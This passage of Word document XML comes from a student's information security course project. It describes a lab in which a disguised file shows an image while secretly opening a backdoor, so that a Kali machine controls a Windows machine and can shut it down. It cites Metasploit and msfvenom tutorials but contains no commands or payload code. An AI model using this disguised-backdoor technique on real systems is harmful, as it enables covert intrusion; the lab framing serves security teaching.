          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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running the commands</w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000137C1" w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not going to be displayed to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E2858" w14:textId="78E7AD1F" w:rsidR="00774AE9" w:rsidRPr="000137C1" w:rsidRDefault="00774AE9" w:rsidP="00C6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EE000" wp14:editId="26721336">
            <wp:extent cx="3131820" cy="438070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11" b="23233"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3143893" cy="43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80AF2" w14:textId="3F74497E" w:rsidR="000137C1" w:rsidRPr="000137C1" w:rsidRDefault="000137C1" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Convert</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the file and </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>double click it</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. An image is going to be displayed and the backdoor is going to be </w:t>
      </w:r>
      <w:r w:rsidR="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opened</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F8103C" w14:textId="77777777" w:rsidR="00774AE9" w:rsidRDefault="000137C1" w:rsidP="00C61F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Next, </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>go back</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9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0137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal. </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The connection is already established</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and kali has control over the windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417A679" w14:textId="77777777" w:rsidR="00774AE9" w:rsidRDefault="00774AE9" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7E9CFA" w14:textId="55655793" w:rsidR="00774AE9" w:rsidRPr="00774AE9" w:rsidRDefault="00774AE9" w:rsidP="00C61FA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74A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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CCAF13" w14:textId="77777777" w:rsidR="00774AE9" w:rsidRPr="00774AE9" w:rsidRDefault="000137C1" w:rsidP="00C61F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You can type </w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="00774AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain more information about the commands that you can now execute on the windows machine through kali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A107505" w14:textId="77777777" w:rsidR="00011651" w:rsidRDefault="000137C1" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You can even </w:t>
      </w:r>
      <w:r w:rsidRPr="00011651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the windows machine with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00011651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="000137C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.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A2181" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140" w:rsidP="00C61FA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51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Inspired by: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E3D44" w14:textId="19D2A12F" w:rsidR="00011651" w:rsidRDefault="00B05140" w:rsidP="00C61F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514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Offensive Security Tutorials </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05140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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00F31F2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https://www.offensive-security.com/metasploit-unleashed/msfcli/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B5D765D" w14:textId="16B1C367" w:rsidR="00B05140" w:rsidRPr="00B05140" w:rsidRDefault="00B05140" w:rsidP="00C61FA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051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msfvenom? How to use it?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hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00F31F2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https://blog.knoldus.com/what-is-msfvenom-how-to-use-it/#2-reverse-tcp-payload</w:t>
        </w:r>
      </w:hyperlink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7FA4D94" w14:textId="19EF34C8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21F83EFB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686FF41B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lastRenderedPageBreak/>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E6572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5E7B9980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4FA764DA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76ED6792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1EB904F7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12E4E6A4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6F84966B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1B90E647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254754A0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04128825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009FE409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2B0C2400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72EFB7F5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1B03C68B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2D1AFA43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3341D148" w14:textId="77777777" w:rsidR="00011651" w:rsidRPr="00011651" w:rsidRDefault="00011651" w:rsidP="00C61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69894D68" w14:textId="77777777" w:rsidR="00B05140" w:rsidRPr="00011651" w:rsidRDefault="00B05140" w:rsidP="00B0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651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B7D99" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140" w:rsidP="00B05140">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B05140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11651">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>˅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3C296" w14:textId="6330DF88" w:rsidR="000137C1" w:rsidRDefault="000137C1" w:rsidP="00C61FA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FC3E05" w14:textId="67CD68EC" w:rsidR="00011651" w:rsidRPr="000137C1" w:rsidRDefault="00B05140" w:rsidP="00C61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DFD92" wp14:editId="54FA1183">
            <wp:extent cx="9248377" cy="4937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743" cy="493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651" w:rsidRPr="000137C1" w:rsidSect="00011651">
      <w:headerReference w:type="default" r:id="rId15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05CB5" w14:textId="77777777" w:rsidR="00BB44EE" w:rsidRDefault="00BB44EE" w:rsidP="00C61FA7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14D12CDE" w14:textId="77777777" w:rsidR="00BB44EE" w:rsidRDefault="00BB44EE" w:rsidP="00C61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5D13" w14:textId="77777777" w:rsidR="00BB44EE" w:rsidRDefault="00BB44EE" w:rsidP="00C61FA7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="158488A5" w14:textId="77777777" w:rsidR="00BB44EE" w:rsidRDefault="00BB44EE" w:rsidP="00C61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4939" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>INF 370 Information Security</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="680BE619" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Professor Hristova</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2B87377B" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Hands-On Project</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7D6840D2" w14:textId="77777777" w:rsidR="00B05140" w:rsidRDefault="00B05140">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Elena Ivanova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E08B" w14:textId="345667A7" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>INF 370 Information Security</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="71D34835" w14:textId="23C5D0FD" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Professor Hristova</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="76EF364D" w14:textId="4ACA9FAA" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Hands-On Project</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5A5C0C8E" w14:textId="5B207BAA" w:rsidR="00C61FA7" w:rsidRDefault="00C61FA7">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Elena Ivanova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75"/>
    <w:rsid w:val="00011651"/>
    <w:rsid w:val="000137C1"/>
    <w:rsid w:val="000F0B75"/>
    <w:rsid w:val="00172F91"/>
    <w:rsid w:val="001C0719"/>
    <w:rsid w:val="00774AE9"/>
    <w:rsid w:val="00857335"/>
    <w:rsid w:val="00B05140"/>
    <w:rsid w:val="00BB44EE"/>
    <w:rsid w:val="00C21826"/>
    <w:rsid w:val="00C61FA7"/>
    <w:rsid w:val="00CE46A7"/>
    <w:rsid w:val="00E5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A264"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08F73582-A348-493F-80A5-964D06EC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F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61F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FA7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5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7AE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7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blog.knoldus.com/what-is-msfvenom-how-to-use-it/#2-reverse-tcp-payloa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offensive-security.com/metasploit-unleashed/msfcli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Ivanova</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Elena Ivanova</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-26T19:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-26T21:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>